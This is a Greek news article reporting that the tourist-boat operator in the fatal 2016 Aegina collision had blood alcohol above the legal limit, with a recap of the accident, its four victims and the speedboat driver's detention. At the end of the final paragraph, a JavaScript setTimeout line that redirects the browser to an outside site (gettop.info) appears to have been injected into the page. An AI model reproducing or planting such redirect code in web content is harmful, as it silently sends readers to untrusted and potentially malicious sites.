Νέες εξελίξεις στην τραγωδία της Αίγινας – Μεθυσμένος ο χειριστής της λάντζας;

0
7

 

Νέες εξελίξεις στην τραγωδία της Αίγινας, καθώς σύμφωνα με τα τελευταία στοιχεία, ο 58χρονος καπετάνιος της μοιραίας λάντζας, στην οποία επέβαιναν τα θύματα του ναυτικού δυστυχήματος, και έχασε και ο ίδιος τη ζωή του, είχε καταναλώσει ποσότητα αλκοόλ αρκετά μεγαλύτερη του κανονικού.

Σύμφωνα με έκθεση τοξικολογικής εξέτασης του Εργαστηρίου Τοξικολογίας του Πανεπιστημίου της Αθήνας, που συντάχθηκε στις 20 Οκτωβρίου 2016 και παρουσιάζει η εφημερίδα «Το Βήμα», στο αίμα του χειριστή του πλοιαρίου «Αντωνία», ο οποίος επίσης έχασε τη ζωή του στο δυστύχημα, βρέθηκε αλκοόλ της τάξης των 0,69 γραμμαρίων ανά λίτρο με όριο το 0,50.

Η διαπίστωση αυτή αναμένεται να έχει σημαντικό ρόλο στη δικαστική διερεύνηση της υπόθεσης. Και αυτό διότι υπάρχουν ασαφή στοιχεία στις συνθήκες του ναυτικού δυστυχήματος και η άνω των ορίων χρήση αλκοόλ του χειριστή του πλοιαρίου μπορεί να κριθεί ότι έχει συμβάλει στην καθυστερημένη αντίδρασή του κατά τη δραματική σύγκρουσή του με το ταχύπλοο. Επιπλέον μπορεί να τεθεί, σύμφωνα με νομικούς, θέμα πως «ο χειριστής του πλοίου που θα μετέφερε τόσα άτομα με το τουριστικό πλοιάριο να είχε υπερβεί τα όρια στη χρήση αλκοόλ και να βρισκόταν σε κατάσταση σχετική μέθης».

Υπενθυμίζεται πως το ναυτικό δυστύχημα σημειώθηκε στις 12.30 το μεσημέρι της 16ης Αυγούστου 2016, όταν το ταχύπλοο «Duende» το οποίο οδηγούσε ο 77χρονος επιχειρηματίας Θρασύβουλος Λυκουρέζος, με επιβάτες τρεις ηλικιωμένους φίλους του, εμβόλισε το τουριστικό πλοιάριο «Αντωνία» στο οποίο επέβαιναν 24 άτομα, από τα οποία πνίγηκαν τα τέσσερα, ανάμεσά τους και ένα πεντάχρονο αγόρι.

Από την προανάκριση της υπόθεσης κρίθηκε προφυλακιστέος ο 77χρονος χειριστής του ταχύπλοου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here